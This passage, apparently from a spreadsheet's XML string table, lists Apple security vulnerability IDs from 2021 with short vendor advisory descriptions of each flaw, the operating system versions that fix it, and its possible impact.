    <t>CVE-2021-30864</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.0.1. A sandboxed process may be able to circumvent sandbox restrictions.</t>
  </si>
  <si>
    <t>CVE-2021-30865</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.6, Security Update 2021-005 Catalina. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30866</t>
  </si>
  <si>
    <t>A user privacy issue was addressed by removing the broadcast MAC address. This issue is fixed in tvOS 15, watchOS 8, iOS 15 and iPadOS 15. A device may be passively tracked by its WiFi MAC address.</t>
  </si>
  <si>
    <t>CVE-2021-30867</t>
  </si>
  <si>
    <t>The issue was addressed with improved authentication. This issue is fixed in iOS 15 and iPadOS 15. A malicious application may be able to access photo metadata without needing permission to access photos.</t>
  </si>
  <si>
    <t>CVE-2021-30868</t>
  </si>
  <si>
    <t>A race condition was addressed with improved locking. This issue is fixed in macOS Monterey 12.0.1, macOS Big Sur 11.6.1. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30869</t>
  </si>
  <si>
    <t>A type confusion issue was addressed with improved state handling. This issue is fixed in iOS 12.5.5, iOS 14.4 and iPadOS 14.4, macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, Security Update 2021-006 Catalina. A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of reports that an exploit for this issue exists in the wild.</t>
  </si>
  <si>
    <t>CVE-2021-30870</t>
  </si>
  <si>
    <t>A logic issue existed in the handling of document loads. This issue was addressed with improved state management. This issue is fixed in iOS 15 and iPadOS 15. Previewing an html file attached to a note may unexpectedly contact remote servers.</t>
  </si>
  <si>
    <t>CVE-2021-30871</t>
  </si>
  <si>
    <t>This issue was addressed with a new entitlement. This issue is fixed in iOS 14.7, watchOS 7.6, macOS Big Sur 11.5. A local attacker may be able to access analytics data.</t>
  </si>
  <si>
    <t>CVE-2021-30873</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.0.1. A malicious application may be able to elevate privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30874</t>
  </si>
  <si>
    <t>An authorization issue was addressed with improved state management. This issue is fixed in iOS 15 and iPadOS 15. A VPN configuration may be installed by an app without user permission.</t>
  </si>
  <si>
    <t>CVE-2021-30875</t>
  </si>
  <si>
    <t>A lock screen issue allowed access to contacts on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 15.1 and iPadOS 15.1. A local attacker may be able to view contacts from the lock screen.</t>
  </si>
  <si>
    <t>CVE-2021-30876</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.0.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory.</t>
  </si>
  <si>
    <t>CVE-2021-30877</t>
  </si>
  <si>
    <t>CVE-2021-30879</t>
  </si>
  <si>
    <t>CVE-2021-30880</t>
  </si>
  <si>
    <t>CVE-2021-30881</t>
  </si>
  <si>
    <t>An input validation issue was addressed with improved memory handling. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1, tvOS 15.1, watchOS 8.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. Unpacking a maliciously crafted archive may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30882</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in watchOS 8, iOS 15 and iPadOS 15. An application with microphone permission may unexpectedly access microphone input during a FaceTime call.</t>
  </si>
  <si>
    <t>CVE-2021-30883</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 15.0.2 and iPadOS 15.0.2, macOS Monterey 12.0.1, iOS 14.8.1 and iPadOS 14.8.1, tvOS 15.1, watchOS 8.1, macOS Big Sur 11.6.1. An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited..</t>
  </si>
  <si>
    <t>CVE-2021-30884</t>
  </si>
  <si>
    <t>The issue was resolved with additional restrictions on CSS compositing. This issue is fixed in tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Visiting a maliciously crafted website may reveal a user's browsing history.</t>
  </si>
  <si>
    <t>CVE-2021-30886</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.0.1, iOS 15.1 and iPadOS 15.1, watchOS 8.1, tvOS 15.1. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30887</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.0.1, iOS 15.1 and iPadOS 15.1, watchOS 8.1, tvOS 15.1. Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy.</t>
  </si>
  <si>
    <t>CVE-2021-30888</t>
  </si>
  <si>
    <t>An information leakage issue was addressed. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1, iOS 14.8.1 and iPadOS 14.8.1, tvOS 15.1, watchOS 8.1. A malicious website using Content Security Policy reports may be able to leak information via redirect behavior .</t>
  </si>
  <si>
    <t>CVE-2021-30889</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.0.1, iOS 15.1 and iPadOS 15.1, watchOS 8.1, tvOS 15.1. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30890</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.0.1, iOS 15.1 and iPadOS 15.1, watchOS 8.1, tvOS 15.1. Processing maliciously crafted web content may lead to universal cross site scripting.</t>
  </si>
  <si>
    <t>CVE-2021-30892</t>
  </si>
  <si>
    <t>An inherited permissions issue was addressed with additional restrictions. This issue is fixed in macOS Monterey 12.0.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. A malicious application may be able to modify protected parts of the file system.</t>
  </si>
  <si>
    <t>CVE-2021-30894</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.1 and iPadOS 15.1, tvOS 15.1. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30895</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.0.2 and iPadOS 15.0.2, tvOS 15.1, watchOS 8.1, macOS Monterey 12.0.1. A malicious application may be able to access information about a user's contacts.</t>
  </si>
  <si>
    <t>CVE-2021-30896</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.0.2 and iPadOS 15.0.2, tvOS 15.1, watchOS 8.1, macOS Monterey 12.0.1. A malicious application may be able to read user's gameplay data.</t>
  </si>
  <si>
    <t>CVE-2021-30897</t>
  </si>
  <si>
    <t>An issue existed in the specification for the resource timing API. The specification was updated and the updated specification was implemented. This issue is fixed in macOS Monterey 12.0.1. A malicious website may exfiltrate data cross-origin.</t>
  </si>
  <si>
    <t>CVE-2021-30898</t>
  </si>
  <si>
    <t>An access issue was addressed with additional sandbox restrictions on third party applications. This issue is fixed in iOS 15 and iPadOS 15. A malicious application may be able to access some of the user's Apple ID information, or recent in-app search terms.</t>
  </si>
  <si>
    <t>CVE-2021-30899</t>
  </si>
  <si>
    <t>A race condition was addressed with improved state handling. This issue is fixed in macOS Monterey 12.0.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30900</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 14.8.1 and iPadOS 14.8.1, iOS 15.1 and iPadOS 15.1. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30901</t>
  </si>
  <si>
    <t>Multiple out-of-bounds write issues were addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.0.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30902</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.8.1 and iPadOS 14.8.1, iOS 15.1 and iPadOS 15.1. A local attacker may be able to cause unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30903</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 14.8.1 and iPadOS 14.8.1, iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1. A local attacker may be able to cause unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30904</t>
  </si>
  <si>
    <t>A sync issue was addressed with improved state validation. This issue is fixed in macOS Monterey 12.0.1. A user's messages may continue to sync after the user has signed out of iMessage.</t>
  </si>
  <si>
    <t>CVE-2021-30905</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1, tvOS 15.1, watchOS 8.1, Security Update 2021-007 Catalina. Processing a maliciously crafted file may disclose user information.</t>
  </si>
  <si>
    <t>CVE-2021-30906</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1, tvOS 15.1, watchOS 8.1, macOS Big Sur 11.6.1. A local attacker may be able to elevate their privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30907</t>
  </si>
  <si>
    <t>An integer overflow was addressed through improved input validation. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1, iOS 14.8.1 and iPadOS 14.8.1, tvOS 15.1, watchOS 8.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. A malicious application may be able to elevate privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30908</t>
  </si>
  <si>
    <t>An authentication issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.0.1, macOS Big Sur 11.6.1. A local attacker may be able to view the previous logged-in user’s desktop from the fast user switching screen.</t>
  </si>
  <si>
    <t>CVE-2021-30909</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1, iOS 14.8.1 and iPadOS 14.8.1, tvOS 15.1, watchOS 8.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30910</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1, tvOS 15.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. Processing a maliciously crafted file may disclose user information.</t>
  </si>
  <si>
    <t>CVE-2021-30911</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.0.1, Security Update 2021-007 Catalina, iOS 15.1 and iPadOS 15.1, macOS Big Sur 11.6.1. Processing a maliciously crafted USD file may disclose memory contents.</t>
  </si>
  <si>
    <t>CVE-2021-30912</t>
  </si>
  <si>
    <t>The issue was addressed with improved permissions logic. This issue is fixed in macOS Monterey 12.0.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. A malicious application may gain access to a user's Keychain items.</t>
  </si>
  <si>
    <t>CVE-2021-30913</t>
  </si>
  <si>
    <t>The issue was addressed with improved permissions logic. This issue is fixed in macOS Monterey 12.0.1, macOS Big Sur 11.6.1. An unprivileged application may be able to edit NVRAM variables.</t>
  </si>
  <si>
    <t>CVE-2021-30914</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.1 and iPadOS 15.1. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30915</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1, tvOS 15.1, watchOS 8.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. A person with physical access to an iOS device may be able to determine characteristics of a user's password in a secure text entry field.</t>
  </si>
  <si>
    <t>CVE-2021-30916</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1, iOS 14.8.1 and iPadOS 14.8.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30917</t>
  </si>
  <si>
    <t>A memory corruption issue existed in the processing of ICC profiles. This issue was addressed with improved input validation. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1, iOS 14.8.1 and iPadOS 14.8.1, tvOS 15.1, watchOS 8.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30918</t>
  </si>
  <si>
    <t>A Lock Screen issue was addressed with improved state management. This issue is fixed in iOS 14.8.1 and iPadOS 14.8.1, iOS 15.0.1 and iPadOS 15.0.1. A user may be able to view restricted content from the Lock Screen.</t>
  </si>
  <si>
    <t>CVE-2021-30919</t>
  </si>
  <si>
    <t>An out-of-bounds write was addressed with improved input validation. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1, iOS 14.8.1 and iPadOS 14.8.1, tvOS 15.1, watchOS 8.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. Processing a maliciously crafted PDF may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30920</t>
  </si>
  <si>
    <t>A permissions issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.0.1. A local attacker may be able to read sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-30921</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in iOS 14.5 and iPadOS 14.5. A user's password may be visible onscreen.</t>
  </si>
  <si>
    <t>CVE-2021-30922</t>
  </si>
  <si>
    <t>Multiple out-of-bounds write issues were addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.1. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30923</t>
  </si>
  <si>
    <t>A race condition was addressed with improved locking. This issue is fixed in macOS Monterey 12.0.1. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30924</t>
  </si>
  <si>
    <t>A denial of service issue was addressed with improved state handling. This issue is fixed in macOS Monterey 12.0.1. A remote attacker can cause a device to unexpectedly restart.</t>
  </si>
  <si>
    <t>CVE-2021-30925</t>
  </si>
  <si>
    <t>The issue was addressed with improved permissions logic. This issue is fixed in watchOS 8, macOS Big Sur 11.6, iOS 15 and iPadOS 15. A malicious application may be able to bypass Privacy preferences.</t>
  </si>
  <si>
    <t>CVE-2021-30926</t>
  </si>
  <si>
    <t>Description: A memory corruption issue in the processing of ICC profiles was addressed with improved input validation. This issue is fixed in macOS Monterey 12.1, watchOS 8.3, iOS 15.2 and iPadOS 15.2, tvOS 15.2. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30927</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30928</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.6, watchOS 8, tvOS 15, iOS 14.8 and iPadOS 14.8, iOS 15 and iPadOS 15. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30929</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.1, iOS 15.2 and iPadOS 15.2, macOS Big Sur 11.6.2, Security Update 2021-008 Catalina. Processing a maliciously crafted USD file may disclose memory contents.</t>
  </si>
  <si>
    <t>CVE-2021-30930</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.0.1. An attacker may be able to track users through their IP address.</t>
  </si>
  <si>
    <t>CVE-2021-30931</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.0.1, macOS Big Sur 11.6.2, Security Update 2021-008 Catalina. A malicious application may be able to disclose kernel memory.</t>
  </si>
  <si>
    <t>CVE-2021-30932</t>
  </si>
  <si>
    <t>The issue was addressed with improved permissions logic. This issue is fixed in iOS 15.2 and iPadOS 15.2. A person with physical access to an iOS device may be able to access contacts from the lock screen.</t>
  </si>
  <si>
    <t>CVE-2021-30933</t>
  </si>
  <si>
    <t>A race condition was addressed with improved state handling. This issue is fixed in macOS Monterey 12.0.1, macOS Big Sur 11.6. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30934</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30935</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in Security Update 2021-008 Catalina, macOS Big Sur 11.6.2. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30936</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30937</t>
  </si>
  <si>
    <t>A memory corruption vulnerability was addressed with improved locking. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30938</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Monterey 12.1, Security Update 2021-008 Catalina, macOS Big Sur 11.6.2. A local user may be able to cause unexpected system termination or read kernel memory.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2021-30939</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30940</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.1, iOS 15.2 and iPadOS 15.2, macOS Big Sur 11.6.2, Security Update 2021-008 Catalina. Processing a maliciously crafted USD file may disclose memory contents.</t>
  </si>
  <si>
    <t>CVE-2021-30941</t>
  </si>
  <si>
    <t>CVE-2021-30942</t>
  </si>
  <si>
    <t>Description: A memory corruption issue in the processing of ICC profiles was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30943</t>
  </si>
  <si>
    <t>An issue in the handling of group membership was resolved with improved logic. This issue is fixed in iOS 15.2 and iPadOS 15.2, watchOS 8.3, macOS Monterey 12.1. A malicious user may be able to leave a messages group but continue to receive messages in that group.</t>
  </si>
  <si>
    <t>CVE-2021-30944</t>
  </si>
  <si>
    <t>Description: A logic issue was addressed with improved state management. This issue is fixed in iOS 15.2 and iPadOS 15.2, watchOS 8.3, macOS Monterey 12.1, tvOS 15.2. A malicious app may be able to access data from other apps by enabling additional logging.</t>
  </si>
  <si>
    <t>CVE-2021-30945</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. A local attacker may be able to elevate their privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30946</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.1, watchOS 8.3, iOS 15.2 and iPadOS 15.2, macOS Big Sur 11.6.2. A malicious application may be able to bypass certain Privacy preferences.</t>
  </si>
  <si>
    <t>CVE-2021-30947</t>
  </si>
  <si>
    <t>An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, iOS 15.2 and iPadOS 15.2, watchOS 8.3. An application may be able to access a user's files.</t>
  </si>
  <si>
    <t>CVE-2021-30948</t>
  </si>
  <si>
    <t>An inconsistent user interface issue was addressed with improved state management. This issue is fixed in iOS 15.2 and iPadOS 15.2. A person with physical access to an iOS device may be able to access stored passwords without authentication.</t>
  </si>
  <si>
    <t>CVE-2021-30949</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30950</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.1, Security Update 2021-008 Catalina, macOS Big Sur 11.6.2. A malicious application may bypass Gatekeeper checks.</t>
  </si>
  <si>
    <t>CVE-2021-30951</t>
  </si>
  <si>
    <t>CVE-2021-30952</t>
  </si>
  <si>
    <t>An integer overflow was addressed with improved input validation. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30953</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30954</t>
  </si>
  <si>
    <t>A type confusion issue was addressed with improved memory handling. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30955</t>
  </si>
  <si>
    <t>A race condition was addressed with improved state handling. This issue is fixed in macOS Monterey 12.1, watchOS 8.3, iOS 15.2 and iPadOS 15.2, tvOS 15.2. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30956</t>
  </si>
  <si>
    <t>A lock screen issue allowed access to contacts on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 15.2 and iPadOS 15.2. An attacker with physical access to a device may be able to see private contact information.</t>
  </si>
  <si>
    <t>CVE-2021-30957</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.1, watchOS 8.3, iOS 15.2 and iPadOS 15.2, tvOS 15.2. Processing a maliciously crafted audio file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30958</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Playing a malicious audio file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30959</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in Security Update 2021-008 Catalina, macOS Big Sur 11.6.2. Parsing a maliciously crafted audio file may lead to disclosure of user information.</t>
  </si>
  <si>
    <t>CVE-2021-30960</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.1, watchOS 8.3, iOS 15.2 and iPadOS 15.2, tvOS 15.2. Parsing a maliciously crafted audio file may lead to disclosure of user information.</t>
  </si>
  <si>
    <t>CVE-2021-30961</t>
  </si>
  <si>
    <t>CVE-2021-30962</t>
  </si>
  <si>
    <t>A memory initialization issue was addressed with improved memory handling. This issue is fixed in tvOS 15.2, macOS Big Sur 11.6.2. Parsing a maliciously crafted audio file may lead to disclosure of user information.</t>
  </si>
  <si>
    <t>CVE-2021-30963</t>
  </si>
  <si>
    <t>CVE-2021-30964</t>
  </si>
  <si>
    <t>An inherited permissions issue was addressed with additional restrictions. This issue is fixed in macOS Monterey 12.1, watchOS 8.3, iOS 15.2 and iPadOS 15.2. A malicious application may be able to bypass Privacy preferences.</t>
  </si>
  <si>
    <t>CVE-2021-30965</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.1, Security Update 2021-008 Catalina, macOS Big Sur 11.6.2. A malicious application may be able to cause a denial of service to Endpoint Security clients.</t>
  </si>
  <si>
    <t>CVE-2021-30966</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.1, watchOS 8.3, iOS 15.2 and iPadOS 15.2, tvOS 15.2. User traffic might unexpectedly be leaked to a proxy server despite PAC configurations.</t>
  </si>
  <si>
    <t>CVE-2021-30967</t>
  </si>
  <si>
    <t>Description: A permissions issue was addressed with improved validation. This issue is fixed in iOS 15.2 and iPadOS 15.2. A local attacker may be able to read sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-30968</t>
  </si>
  <si>
    <t>A validation issue related to hard link behavior was addressed with improved sandbox restrictions. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. A malicious application may be able to bypass certain Privacy preferences.</t>
  </si>
  <si>
    <t>CVE-2021-30969</t>
  </si>
  <si>
    <t>A path handling issue was addressed with improved validation. This issue is fixed in Security Update 2021-008 Catalina, macOS Big Sur 11.6.2. Processing a maliciously crafted URL may cause unexpected JavaScript execution from a file on disk.</t>
  </si>
  <si>
    <t>CVE-2021-30970</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.1, macOS Big Sur 11.6.2. A malicious application may be able to bypass Privacy preferences.</t>
  </si>
  <si>
    <t>CVE-2021-30971</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.1, iOS 15.2 and iPadOS 15.2, macOS Big Sur 11.6.2, Security Update 2021-008 Catalina. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30972</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in Security Update 2022-001 Catalina, macOS Big Sur 11.6.3. A malicious application may be able to bypass certain Privacy preferences.</t>
  </si>
  <si>
    <t>CVE-2021-30973</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Monterey 12.1, iOS 15.2 and iPadOS 15.2, macOS Big Sur 11.6.2, Security Update 2021-008 Catalina. Processing a maliciously crafted file may disclose user information.</t>
  </si>
  <si>
    <t>CVE-2021-30975</t>
  </si>
  <si>
    <t>This issue was addressed by disabling execution of JavaScript when viewing a scripting dictionary. This issue is fixed in macOS Monterey 12.1, Security Update 2021-008 Catalina, macOS Big Sur 11.6.2. A malicious OSAX scripting addition may bypass Gatekeeper checks and circumvent sandbox restrictions.</t>
  </si>
  <si>
    <t>CVE-2021-30976</t>
  </si>
  <si>
    <t>CVE-2021-30977</t>
  </si>
  <si>
    <t>A buffer overflow was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.1, Security Update 2021-008 Catalina, macOS Big Sur 11.6.2. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30979</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.1, iOS 15.2 and iPadOS 15.2, macOS Big Sur 11.6.2, Security Update 2021-008 Catalina. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30980</t>
  </si>
  <si>
    <t>CVE-2021-30981</t>
  </si>
  <si>
    <t>A buffer overflow was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.1, Security Update 2021-008 Catalina, macOS Big Sur 11.6.2. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30982</t>
  </si>
  <si>
